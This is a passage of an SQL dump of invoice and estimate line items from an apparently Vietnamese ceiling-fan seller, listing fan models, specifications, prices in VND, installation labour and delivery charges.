8600000.00, '', 1, 25, '', 0.00),
(582, 205, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 8600000.00, '', 1, 0, NULL, 0.00),
(583, 121, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển dành cho model: Aroma 52', 1.00, 850000.00, '', 1, 0, '', 0.00),
(584, 206, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển dành cho model: Aroma 52', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(585, 122, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Điều khiển quạt ONIX - bộ điều khiển bao gồm thu/phát (receiver) - tay cầm (remote)', 2.00, 850000.00, '', 1, 0, '', 0.00),
(586, 207, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Điều khiển quạt ONIX - bộ điều khiển bao gồm thu/phát (receiver) - tay cầm (remote)', 2.00, 850000.00, '', 1, 0, NULL, 0.00),
(588, 208, 'invoice', 'DC-6028A', 'Sải cánh 112cm <br />\r\nĐộng cơ DC, 38W<br />\r\nSố cánh: 4 cánh nhựa trong<br />\r\nMàu thân quạt: Gold<br />\r\nĐiều khiển 6 tốc độ', 1.00, 7500000.00, '', 1, 0, '', 0.00),
(590, 209, 'invoice', 'DC-6028A', 'Sải cánh 112cm <br />\r\nĐộng cơ DC, 38W<br />\r\nSố cánh: 4 cánh nhựa trong<br />\r\nMàu thân quạt: Gold<br />\r\nĐiều khiển 6 tốc độ', 1.00, 7500000.00, '', 1, 0, '', 0.00),
(591, 210, 'invoice', 'Bộ điều khiển DC gắn tường vuông 6 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển gắn tường - chưa bao gồm bộ thu/phát (receiver)', 4.00, 350000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(592, 211, 'invoice', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W (màu trắng)', '', 1.00, 5800000.00, '', 1, 25, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(594, 123, 'estimate', 'Haiku L 52 inch White', 'Sải cánh 132cm (52inch)   <br />\r\nĐộng cơ EC, công suất 20.9W   <br />\r\nMàu thân/cánh: Trắng <br />\r\nĐiều khiển từ xa 7 cấp đi kèm   <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V;', 1.00, 21600000.00, '', 1, 15, NULL, 0.00),
(595, 212, 'invoice', 'Haiku L 52 inch White', 'Sải cánh 132cm (52inch)   <br />\r\nĐộng cơ EC, công suất 20.9W   <br />\r\nMàu thân/cánh: Trắng <br />\r\nĐiều khiển từ xa 7 cấp đi kèm   <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V<br />\r\nThương hiệu: Haiku/USA', 1.00, 21600000.00, '', 1, 15, NULL, 0.00),
(596, 124, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China <br />\r\n', 1.00, 6500000.00, '', 1, 25, '', 0.00),
(597, 124, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt móc ty treo ren có sẳn - điện có sẳn', 1.00, 150000.00, '', 2, 0, '', 0.00),
(598, 213, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, '', 1, 25, NULL, 0.00),
(599, 213, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt móc ty treo ren có sẳn - điện có sẳn', 1.00, 150000.00, '', 2, 0, NULL, 0.00),
(600, 125, 'estimate', 'Bộ điều khiển DC 6 tốc đọ Tổ chức đào tạo WIT ', 'Bộ điều khiển quạt Tobago led', 1.00, 850000.00, '', 1, 0, '', 0.00),
(601, 125, 'estimate', 'Bộ đèn led', 'Bộ đèn led quạt Tobago', 1.00, 500000.00, '', 2, 0, '', 0.00),
(604, 214, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế:<br />\r\nBộ đèn theo quạt TOBAGO LED 3000k', 1.00, 500000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(605, 214, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', 'Bộ điều khiển quạt TOBAGO LED', 1.00, 850000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(609, 126, 'estimate', 'Haiku 60 inch Caramel Bamboo', 'Haiku 60 inch Caramel Bamboo <br />\r\nMount: Low Profile<br />\r\nMàu cánh: Caramel Bambô<br />\r\nMàu thân: Đen<br />\r\nĐiều khiển qua APP,  onboard SenseME (cảm biến nhiệt độ ẩm, hồng ngoại Fan-Eco bao gồm)', 7.00, 35700000.00, '', 1, 10, NULL, 0.00),
(610, 126, 'estimate', 'Bộ đèn LED Haiku - H Series - 006580 (Indoor)', 'Đèn LED dành cho Haiku H <br />\r\nModel:  006580 <br />\r\nLumen: 2700K<br />\r\nDimmable 16 level', 7.00, 8250000.00, 'cái', 2, 0, NULL, 0.00),
(611, 126, 'estimate', 'Quạt trần cao cấp IRIS 60 Black ABS', 'SUNON Modern HVLS <br />\r\nSải cánh 1.5m<br />\r\nMàu đen<br />\r\nSUNON/Taiwan', 4.00, 12300000.00, '', 3, 5, NULL, 0.00),
(612, 215, 'invoice', 'Haiku 60 inch Caramel Bamboo', 'Haiku 60 inch Caramel Bamboo <br />\r\nMount: Low Profile<br />\r\nMàu cánh: Caramel Bambô<br />\r\nMàu thân: Đen<br />\r\nĐiều khiển qua APP,  onboard SenseME (cảm biến nhiệt độ ẩm, hồng ngoại Fan-Eco bao gồm)', 7.00, 35700000.00, '', 1, 10, NULL, 0.00),
(614, 215, 'invoice', 'Quạt trần cao cấp IRIS 60 Black ABS', 'SUNON Modern HVLS <br />\r\nSải cánh 1.5m<br />\r\nMàu đen<br />\r\nSUNON/Taiwan', 4.00, 12300000.00, '', 2, 5, NULL, 0.00),
(615, 127, 'estimate', 'Bộ đèn LED quạt MARION WHITE', 'Bộ đèn LED model: 38YFT7069-12W', 1.00, 600000.00, '', 1, 0, '', 0.00),
(616, 127, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 300000.00, '', 2, 0, '', 0.00),
(617, 216, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: trắng  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\n  Điều khiển từ xa 5 tốc độ đi kèm', 1.00, 4095000.00, '', 1, 35, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(618, 216, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 500000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(619, 128, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', '', 16.00, 3780000.00, '', 1, 0, NULL, 0.00),
(620, 128, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Đi Tam Đảo - Vĩnh Phúc', 1.00, 1500000.00, 'lots', 2, 0, NULL, 0.00),
(621, 217, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', '', 16.00, 3780000.00, '', 1, 0, NULL, 0.00),
(622, 217, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Đi Tam Đảo - Vĩnh Phúc', 1.00, 1500000.00, 'lots', 2, 0, NULL, 0.00),
(626, 218, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao', '', 3.00, 500000.00, '', 1, 0, NULL, 0.00),
(628, 218, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 3.00, 5600000.00, '', 2, 20, 'https://hgphome.com/uploads/items/1867/thumb_akmani_darkwalnut.jpg', 0.00),
(629, 130, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5600000.00, '', 1, 20, '', 0.00),
(630, 130, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'gia cố \"trần thạch cao\"', 3.00, 500000.00, '', 2, 0, '', 0.00),
(631, 219, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 3.00, 5600000.00, '', 1, 20, NULL, 0.00),
(632, 219, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'gia cố \"trần thạch cao\"', 3.00, 500000.00, '', 2, 0, NULL, 0.00),
(633, 129, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 3.00, 5600000.00, '', 1, 20, '', 0.00),
(634, 129, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo trần tấm thạch cao', 3.00, 500000.00, '', 2, 0, '', 0.00),
(635, 131, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '', 1, 0, '', 0.00),
(636, 131, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...  <br />\r\nCông việc:  <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 2.00, 300000.00, 'cái', 2, 0, '', 0.00),
(637, 220, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(638, 220, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...  <br />\r\nCông việc:  <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 2.00, 300000.00, 'cái', 2, 0, NULL, 0.00),
(639, 132, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 2.00, 6500000.00, '', 1, 20, '', 0.00),
(640, 132, 'estimate', 'Chi phí vận chuyển tới chân công trình', '', 1.00, 0.00, 'lots', 2, 0, '', 0.00),
(641, 221, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 2.00, 6500000.00, '', 1, 20, NULL, 0.00),
(642, 221, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Giao hàng miễn phí - Kiên Giang', 1.00, 0.00, 'lots', 2, 0, NULL, 0.00),
(643, 133, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)<br />\r\nMóc treo: loại ốp sát trần<br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 25, '', 0.00),
(644, 133, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Giao hàng Miễn phí - Hà Nội', 1.00, 0.00, 'lots', 2, 0, '', 0.00),
(645, 222, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)<br />\r\nMóc treo: loại ốp sát trần<br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)  <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, '', 1, 20, NULL, 0.00),
(646, 222, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Giao hàng Miễn phí - Hà Nội', 1.00, 0.00, 'lots', 2, 0, NULL, 0.00),
(649, 134, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 1, 0, NULL, 0.00),
(650, 134, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 2, 0, NULL, 0.00),
(654, 223, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 1, 25, NULL, 0.00),
(655, 223, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(656, 135, 'estimate', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China <br />\r\n', 2.00, 6500000.00, '', 1, 20, '', 0.00),
(658, 224, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 2.00, 6500000.00, '', 1, 20, '', 0.00),
(659, 224, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Giao hàng miễn phí - Kiên Giang', 1.00, 0.00, 'lots', 2, 0, '', 0.00),
(661, 136, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 1, 30, '', 0.00),
(662, 136, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo quạt trần', 1.00, 500000.00, '', 2, 0, '', 0.00),
(663, 225, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5600000.00, '', 1, 30, NULL, 0.00),
(664, 225, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo quạt trần', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(665, 137, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 2.00, 5800000.00, '', 1, 25, '', 0.00),
(667, 226, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 2.00, 5800000.00, '', 1, 25, NULL, 0.00),
(669, 138, 'estimate', 'Haiku 60 inch Cocoa Bamboo', 'Model: S3150<br />\r\nSải cánh 1500mm (60inch)<br />\r\nMóc treo: Low Profile<br />\r\nMàu thân: Black<br />\r\nMàu cánh: Cocoa Bamboo<br />\r\nĐiều khiển 7 tốc độ đi kèm<br />\r\nThương hiệu: Haiku / Big Ass Fans', 1.00, 39600000.00, '', 1, 15, NULL, 0.00),
(670, 227, 'invoice', 'Haiku 60 inch Cocoa Bamboo', 'Model: S3150<br />\r\nSải cánh 1500mm (60inch)<br />\r\nMóc treo: Low Profile<br />\r\nMàu thân: Black<br />\r\nMàu cánh: Cocoa Bamboo<br />\r\nĐiều khiển 7 tốc độ đi kèm<br />\r\nThương hiệu: Haiku / Big Ass Fans', 1.00, 39600000.00, '', 1, 15, NULL, 0.00),
(672, 228, 'invoice', 'Quạt trần SAONA OKA 52YFT-7062A (màu vân gỗ)', 'Sải cánh 132cm   <br />\r\nĐộng cơ DC, công suất 36W  <br />\r\nĐiều khiển 6 cấp độ   <br />\r\nMàu sắc: Vân gỗ (KOA)  <br />\r\nĐèn LED 12W, ánh sáng 3 màu  <br />\r\nThương hiệu: Mountain Air/China', 1.00, 5800000.00, '', 1, 30, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(673, 229, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế:<br />\r\nSAONA LED', 1.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1938/thumb_den-led.jpg', 0.00),
(674, 229, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...  <br />\r\nCông việc:  <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 0.00, 200000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(676, 230, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood (màu gỗ sáng)', 'Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White', 1.00, 5800000.00, '', 1, 35, 'https://hgphome.com/uploads/items/1927/thumb_2akmani_.jpg', 0.00),
(677, 230, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(678, 139, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 8800000.00, '', 1, 20, '', 0.00),
(679, 139, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 2, 25, '', 0.00),
(680, 139, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc ty treo quạt trần tấm thạch cao', 1.00, 500000.00, '', 3, 0, '', 0.00),
(681, 139, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Gia cố móc ty treo quạt trần bê tông', 1.00, 350000.00, '', 4, 0, '', 0.00),
(682, 139, 'estimate', 'Thi công lắp đặt đường dây điện cấp nguồn quạt', 'Cáp điện 1.5m2 CVV (cáp điện Cadivi)', 1.00, 500000.00, 'lô', 5, 0, '', 0.00),
(684, 231, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 1.00, 5800000.00, '', 1, 25, NULL, 0.00),
(685, 231, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
